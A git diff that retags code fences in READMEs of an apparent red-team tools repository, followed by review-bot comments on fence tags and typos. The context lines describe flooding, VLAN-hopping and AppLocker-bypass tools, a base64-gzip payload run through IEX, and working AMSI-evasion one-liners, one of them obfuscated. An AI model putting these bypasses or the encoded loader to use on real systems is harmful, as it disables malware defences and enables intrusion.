diff --git a/file-formats/README.md b/file-formats/README.md index 0e7b3a9..25461bf 100644 --- a/file-formats/README.md +++ b/file-formats/README.md @@ -2,7 +2,7 @@ - **`tamperUpx.py`** - A small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored. -``` +```powershell c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe :: tamperUpx - a small utility that corrupts UPX-packed executables, diff --git a/networks/README.md b/networks/README.md index c517f1f..ffd2f9b 100644 --- a/networks/README.md +++ b/networks/README.md @@ -3,7 +3,7 @@ - **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets. The effect will be similar to: -``` +```shell SW2960#show cdp traffic CDP counters : Total packets output: 361, Input: 11824 @@ -28,7 +28,7 @@ victim's premises or to aid Password-Spraying efforts against exposed OWA interface. Sample run: -``` +```powershell PS D:\> python3 .\exchangeRecon.py 10.10.10.9 :: Exchange Fingerprinter @@ -136,7 +136,7 @@ TODO: - Implement sniffer hunting for used protocols and their auth strings - Implement semi-auto mode that is first learning a network, then choosing specific attacks -``` +```bash bash $ python RoutingAttackKit.py :: Routing Protocols Exploitation toolkit @@ -236,7 +236,7 @@ Capturing on 'eth0' Sample output: -``` +```bash $ ./VLANHopperDTP.py --help :: VLAN Hopping via DTP Trunk negotiation diff --git a/others/README.md b/others/README.md index 5f3750b..3c17ae4 100644 --- a/others/README.md +++ b/others/README.md 
@@ -26,7 +26,7 @@ Takes two files on input. Tries to find every line of the second file within the - **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a) -``` +```bash user@my-box $ startkali [>] Launching kali in headless [>] Awaiting for machine to get up... diff --git a/red-teaming/README.md b/red-teaming/README.md index 87b554d..216ed52 100755 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -7,7 +7,7 @@ - **`Bypass-ConstrainedLanguageMode`** - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ ) The way it does so is by registering a custom COM object (`InProcServer32` DLL) that will act as a native *.NET CLR4* host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch `SessionData.LanguageMode` variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself. -``` +```powershell PS > $ExecutionContext.SessionState.LanguageMode ConstrainedLanguage PS > .\Bypass-CLM.ps1 @@ -48,7 +48,7 @@ FullLanguage - **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage: -``` +```powershell cmstp.exe /ni /s cmstp.inf ``` 
@@ -63,7 +63,7 @@ cmstp.exe /ni /s cmstp.inf Example: -``` +```powershell $s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA==')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); ``` @@ -78,7 +78,7 @@ IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Com Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes. -``` +```powershell PS > "amsiInitFailed" At line:1 char:1 + "amsiInitFailed" @@ -97,12 +97,12 @@ amsiInitFailed - OH, by the way - you can grab **my custom AMSI evasion oneliners** below - perfect for a one-shot use cases: * **Technique 1A**: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes. - ``` + ```powershell [Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5) ``` * **Technique 1B**: Same as 1A, but obfuscated variant. (256 bytes) - ``` + ```powershell $h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5) ``` 
@@ -125,7 +125,7 @@ amsiInitFailed - `Import-ReconData -DirName
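Review bot: the `file-formats/README.md` hunk tags the `tamperUpx.py` block as `powershell`, but the block is a cmd.exe session transcript (`c:\>py -3 tamperUpx.py ...`) followed by banner lines that begin with `::`, which a PowerShell highlighter renders as the static-member operator rather than as output. Since the block is captured console output, not a script, a transcript tag (` ```console ` or ` ```text `) fits better; the same consideration applies to the other prompt-plus-output blocks in this patch (`PS D:\>`, `user@my-box $`, `bash $`), where the prompt is not valid syntax in the language the fence now claims.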
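Review bot: the `CDPFlooder.py` hunk in `networks/README.md` tags Cisco IOS CLI output (`SW2960#show cdp traffic`, `CDP counters :`, `Total packets output: 361, Input: 11824`) as `shell`, so the `#` privileged-exec prompt will be highlighted as a comment and the rest as shell code. This block contains no shell at all; ` ```text ` or ` ```console ` is the accurate choice.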
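Review bot: in the `Bypass-ConstrainedLanguageMode` hunk of `red-teaming/README.md`, the context line "load up a managed assembly within it's current AppDomain" should read "its current AppDomain"; since the hunk is already touching this paragraph, fix the typo in the same commit. Separately, the file header shows `red-teaming/README.md` at mode `100755`; a Markdown file has no reason to be executable, so consider dropping the mode to `100644` in a follow-up.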
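Review bot: the `cmstp-template.inf` hunk has a filename mismatch between the bullet and its usage sample: the bullet introduces the file as `cmstp-template.inf`, but the command reads `cmstp.exe /ni /s cmstp.inf`. Either change the sample to `cmstp.exe /ni /s cmstp-template.inf` or add one sentence saying the template is meant to be copied and renamed after the command to execute has been filled in; as written, a reader following the sample verbatim gets a file-not-found from cmstp.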
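Review bot: in the AMSI hash-lookup hunk (`@@ -78,7 +78,7 @@`) the context sentence "Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes" has two grammar errors and is hard to parse; suggest "Since the hash-computation algorithm is open-sourced and simple to change, an attacker can customize the hash-lookup scheme at will." Worth fixing while the fence on the block right below it is being edited.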